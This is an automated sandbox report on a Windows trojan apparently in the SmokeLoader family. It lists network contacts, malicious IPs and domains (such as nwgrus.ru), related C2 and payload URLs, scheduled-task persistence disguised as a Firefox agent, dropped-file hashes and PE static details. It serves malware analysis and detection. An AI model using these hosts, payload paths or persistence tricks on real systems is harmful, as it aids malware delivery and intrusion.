http://schemas.micro	explorer.exe, 00000001.00000000.1797350947.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1791836520.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1792703988.0000000008720000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/q	explorer.exe, 00000001.00000000.1795949633.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000001.00000000.1799460114.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1799460114.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://word.office.com	explorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micr	explorer.exe, 00000001.00000000.1797051096.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://aka.ms/Vh5j3k	explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 00000001.00000000.1795949633.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.msn.com/	explorer.exe, 00000001.00000000.1795949633.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
190.224.203.37	nwgrus.ru	Argentina	7303	TelecomArgentinaSAAR	true
23.145.40.164	unknown	Reserved	22631	SURFAIRWIRELESS-IN-01US	true
190.220.21.28	unknown	Argentina	19037	AMXArgentinaSAAR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532278
Start date and time:	2024-10-12 23:26:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LgigaSKsL6.exe renamed because original name is a hash value
Original Sample Name:	c61f76c54ce0f89894ef870a48c5497c.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/4@23/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 95% Number of executed functions: 80 Number of non-executed functions: 18
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target ajvrjra, PID 3588 because there are no executed function
Execution Graph export aborted for target vsvrjra, PID 5340 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
17:27:32	API Interceptor	375670x Sleep call for process: explorer.exe modified
22:27:32	Task Scheduler	Run new task: Firefox Default Browser Agent 2B22F504E9081C81 path: C:\Users\user\AppData\Roaming\vsvrjra
22:28:36	Task Scheduler	Run new task: Firefox Default Browser Agent BA8964795F88946F path: C:\Users\user\AppData\Roaming\ajvrjra

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
190.224.203.37	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	9VgIkx4su0.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	3441TYcdND.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	gebeus.ru/tmp/index.php
	XQpBmNRd7j.exe	Get hash	malicious	Djvu	Browse	cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
	file.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars Stealer	Browse	sajdfue.com/files/1/build3.exe
	IzXkxsTrEt.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	sajdfue.com/files/1/build3.exe
	dmDeFvntUL.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	sajdfue.com/files/1/build3.exe
	CgoegMEw8J.exe	Get hash	malicious	LummaC, Babuk, Djvu, Glupteba, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	sdfjhuz.com/dl/build2.exe
23.145.40.164	file.exe	Get hash	malicious	SmokeLoader	Browse
	mGFoU1INUk.exe	Get hash	malicious	SmokeLoader	Browse
	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse
	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse
	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse
	IpYWCeJMsb.exe	Get hash	malicious	SmokeLoader	Browse
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse
	T1TmLXusl0.exe	Get hash	malicious	SmokeLoader	Browse
190.220.21.28	6NlY2E3Wqi.exe	Get hash	malicious	SmokeLoader	Browse	100xmargin.com/tmp/index.php
	66d5df681876c_file010924.exe	Get hash	malicious	Babuk, Djvu	Browse	cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
	CbLDghhFAW.exe	Get hash	malicious	SmokeLoader	Browse	yosoborno.com/tmp/
	8xFzJWrEIa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	sajdfue.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
	file.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar	Browse	sajdfue.com/files/1/build3.exe
	file.exe	Get hash	malicious	SmokeLoader	Browse	nidoe.org/tmp/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nwgrus.ru	file.exe	Get hash	malicious	SmokeLoader	Browse	190.147.128.172
	mGFoU1INUk.exe	Get hash	malicious	SmokeLoader	Browse	119.204.11.2
	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60
	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	190.147.2.86
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse	187.211.161.52
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	92.36.226.66
	IpYWCeJMsb.exe	Get hash	malicious	SmokeLoader	Browse	201.103.8.135
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	T1TmLXusl0.exe	Get hash	malicious	SmokeLoader	Browse	210.182.29.70

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMXArgentinaSAAR	SecuriteInfo.com.Linux.Siggen.9999.28522.3483.elf	Get hash	malicious	Mirai	Browse	200.81.85.181
	6NlY2E3Wqi.exe	Get hash	malicious	SmokeLoader	Browse	190.220.21.28
	66d5df681876c_file010924.exe	Get hash	malicious	Babuk, Djvu	Browse	190.220.21.28
	Vertexgroup#Signature.pdf	Get hash	malicious	Unknown	Browse	23.76.39.75
	CbLDghhFAW.exe	Get hash	malicious	SmokeLoader	Browse	190.220.21.28
	ExeFile (260).exe	Get hash	malicious	Emotet	Browse	190.220.19.82
	7HddY6rYkf.elf	Get hash	malicious	Mirai	Browse	200.80.200.184
	arm.elf	Get hash	malicious	Mirai	Browse	190.3.44.186
	https://bushelman-my.sharepoint.com/:b:/p/lance/ESXtc6Laa05KpaC4W3rpMEMBfLSUU1GZhgfhBL8opRqFHg?e=Wrw3le	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	23.76.37.146
	[EXTERNAL] New file received.eml	Get hash	malicious	HTMLPhisher	Browse	23.76.37.146
TelecomArgentinaSAAR	m0mg1WH7Su.elf	Get hash	malicious	Mirai	Browse	190.228.252.163
	na.elf	Get hash	malicious	Unknown	Browse	181.86.228.170
	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	na.elf	Get hash	malicious	Mirai	Browse	190.191.148.132
	cqdEWgq9fW.elf	Get hash	malicious	Mirai	Browse	181.99.116.187
	0aEXGHNxhO.elf	Get hash	malicious	Mirai, Okiru	Browse	181.103.30.179
	AGjaVihni8.elf	Get hash	malicious	Mirai, Gafgyt	Browse	190.191.54.207
	RFNnJGB7wy.elf	Get hash	malicious	Mirai	Browse	190.17.217.229
	na.elf	Get hash	malicious	Unknown	Browse	181.108.115.242
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
SURFAIRWIRELESS-IN-01US	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	mGFoU1INUk.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	IpYWCeJMsb.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	T1TmLXusl0.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
72a589da586844d7f0818ce684948eea	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	mGFoU1INUk.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	LbzlI5idGJ.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	PGUs9p74si.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	IpYWCeJMsb.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	Wd7eNVLo7b.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	T1TmLXusl0.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\A869.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	243712
Entropy (8bit):	5.901474520699552
Encrypted:	false
SSDEEP:	3072:MENmhF3Dt6agWVvGwd/5ogN7vHsq535Q+CoN8yBhFBxqXYUGrG:MEohFzyojagNzm+FKUnqI
MD5:	E3C51CB2EE848A9BED855AB3E756CD82
SHA1:	82387B44686504E395CAF5F097696F9CBFBCE359
SHA-256:	F0419B39C8834855934A744F9787D54D47815490E5DAE270D83AF062713C9AE5
SHA-512:	03680A26145C4B6A1C08788D3ED098BB9F22EB45CA89A0FD7C595B90BE877937BDD569F90BB7A0490852E53DA33FC4F9C93C0E94CCD1B7B54430E817623D5170
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y.......................F.......................Rich..........................PE..L....ijd.................R....r..............p....@...........................s.....F&......................................t...<.... r..............................................................................p..\|............................text....P.......R.................. ..`.rdata..& ...p..."...V..............@..@.data...\|.o..........x..............@....moboge..D....q..8..................@....woyucad.(....q..(..................@....rsrc........ r.....................@..@................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ajvrjra

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	243712
Entropy (8bit):	5.901474520699552
Encrypted:	false
SSDEEP:	3072:MENmhF3Dt6agWVvGwd/5ogN7vHsq535Q+CoN8yBhFBxqXYUGrG:MEohFzyojagNzm+FKUnqI
MD5:	E3C51CB2EE848A9BED855AB3E756CD82
SHA1:	82387B44686504E395CAF5F097696F9CBFBCE359
SHA-256:	F0419B39C8834855934A744F9787D54D47815490E5DAE270D83AF062713C9AE5
SHA-512:	03680A26145C4B6A1C08788D3ED098BB9F22EB45CA89A0FD7C595B90BE877937BDD569F90BB7A0490852E53DA33FC4F9C93C0E94CCD1B7B54430E817623D5170
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y.......................F.......................Rich..........................PE..L....ijd.................R....r..............p....@...........................s.....F&......................................t...<.... r..............................................................................p..\|............................text....P.......R.................. ..`.rdata..& ...p..."...V..............@..@.data...\|.o..........x..............@....moboge..D....q..8..................@....woyucad.(....q..(..................@....rsrc........ r.....................@..@................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\vsvrjra

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	243712
Entropy (8bit):	5.889388111846404
Encrypted:	false
SSDEEP:	3072:2mIRlVcRxMiSBufsq53/Q+CoNnHgCFBxqXYUGrG:27yzQus+FJHhqI
MD5:	C61F76C54CE0F89894EF870A48C5497C
SHA1:	2A7DD87F781DF6FDAA1B17695D93EE9ACCF36D1C
SHA-256:	DC6C2F9D57AEE159B5C6453B56C93FA6976F83A3685B388AFF968E5DFE498841
SHA-512:	9F2290C6F27AE165E4BF78515149C76A6BD6550299F6CA765C70F89F08365BCFF313CE8FB5E4E634B45E80FE6DB8FCB9C121518623A26A535C0728F52B937021
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y.......................F.......................Rich..........................PE..L...Q_We.................R....r..............p....@...........................s.............................................t...<.... r..............................................................................p..\|............................text.../P.......R.................. ..`.rdata..& ...p..."...V..............@..@.data...\|.o..........x..............@....beve....D....q..8..................@....cac.....(....q..(..................@....rsrc........ r.....................@..@................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\vsvrjra:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.889388111846404
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LgigaSKsL6.exe
File size:	243'712 bytes
MD5:	c61f76c54ce0f89894ef870a48c5497c
SHA1:	2a7dd87f781df6fdaa1b17695d93ee9accf36d1c
SHA256:	dc6c2f9d57aee159b5c6453b56c93fa6976f83a3685b388aff968e5dfe498841
SHA512:	9f2290c6f27ae165e4bf78515149c76a6bd6550299f6ca765c70f89f08365bcff313ce8fb5e4e634b45e80fe6db8fcb9c121518623a26a535c0728f52b937021
SSDEEP:	3072:2mIRlVcRxMiSBufsq53/Q+CoNnHgCFBxqXYUGrG:27yzQus+FJHhqI
TLSH:	A63429316EF17C14F6B3CA31CE3996E4EB2FB8D29D24225D21E45A0F09F11A1E56B712
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y............................F............................Rich...........................PE..L...Q_We...

File Icon


Icon Hash:	738733b183a38be4

Static PE Info

General

Entrypoint:	0x4018e4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x65575F51 [Fri Nov 17 12:40:49 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	636068238a0ab0df9c8e341eee8428d0

Entrypoint Preview

Instruction
call 00007F8EE0DA3600h
jmp 00007F8EE0D9FEFDh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0041B3D0h], eax
mov dword ptr [0041B3CCh], ecx
mov dword ptr [0041B3C8h], edx
mov dword ptr [0041B3C4h], ebx
mov dword ptr [0041B3C0h], esi
mov dword ptr [0041B3BCh], edi
mov word ptr [0041B3E8h], ss
mov word ptr [0041B3DCh], cs
mov word ptr [0041B3B8h], ds
mov word ptr [0041B3B4h], es
mov word ptr [0041B3B0h], fs
mov word ptr [0041B3ACh], gs
pushfd
pop dword ptr [0041B3E0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041B3D4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0041B3D8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0041B3E4h], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0041B320h], 00010001h
mov eax, dword ptr [0041B3D8h]
mov dword ptr [0041B2D4h], eax
mov dword ptr [0041B2C8h], C0000409h
mov dword ptr [0041B2CCh], 00000001h
mov eax, dword ptr [0041A008h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0041A00Ch]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000DCh]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x18774	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2722000	0x1cac0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x17000	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1502f	0x15200	01f6569b89b7aebc11e2a92ac03cba2f	False	0.8203471708579881	data	7.53432336875115	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x17000	0x2026	0x2200	8f6c9359eca3fc884976521ff3812793	False	0.36282169117647056	data	5.421499959099582	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1a000	0x26fff7c	0x1400	d3069f75e034ee377a978b9116b86ed9	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.beve	0x271a000	0x4400	0x3800	b211778b80f6d441b6cf61ada776fc6d	False	0.0025809151785714285	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.cac	0x271f000	0x2800	0x2800	1276481102f218c981e0324180bafd9f	False	0.00322265625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2722000	0x1cac0	0x1cc00	d0509ad570f51aa65eb57916d4990bad	False	0.44198369565217394	data	5.086472202691957	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
